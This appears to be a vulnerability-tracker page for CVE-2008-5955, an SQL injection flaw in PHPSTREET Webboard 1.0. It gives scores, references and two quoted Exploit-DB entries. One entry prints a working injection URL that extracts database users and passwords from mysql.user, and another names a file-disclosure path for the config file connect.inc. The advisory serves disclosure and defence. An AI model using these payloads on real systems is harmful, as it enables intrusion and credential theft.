CVE-2008-5955
Published 2009-01-23
CVE-2008-5955: SQL injection vulnerability in show.php in Wbstreet (aka PHPSTREET Webboard) 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Priority: P3 (40), high; CVSS 2.0 score: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.7th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpstreet | webboard | — | — |
No detection rules found.
Exploit-DB
PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection
exploitdb·2008-12-04
CVE-2008-5955 PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection
---
source: https://www.securityfocus.com/bid/32635/info
PHPSTREET Webboard is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user
Exploit-DB
wbstreet 1.0 - SQL Injection / File Disclosure
exploitdb·2008-12-04
CVE-2008-5956 wbstreet 1.0 - SQL Injection / File Disclosure
---
Wbstreet v.1.0 (show.php id) Remote SQL Injection Vulnerability
AUTHOR : CWH Underground
DATE : 4 December 2008
SITE : cwh.citec.us
#####################################################
APPLICATION : Wbstreet
VERSION : v.1.0
VENDOR : www.phpstreet.com
DOWNLOAD : www.ohlanla.com/Dowsload/177254922054.zip
#####################################################
-- Remote Database Disclosure --
[+] http://[Target]/[path]/connect.inc
-- Remote SQL Injection ---
No writeups or analysis indexed.
http://secunia.com/advisories/32994
http://www.securityfocus.com/bid/32635
https://exchange.xforce.ibmcloud.com/vulnerabilities/47073
https://www.exploit-db.com/exploits/7337
Published: 2009-01-23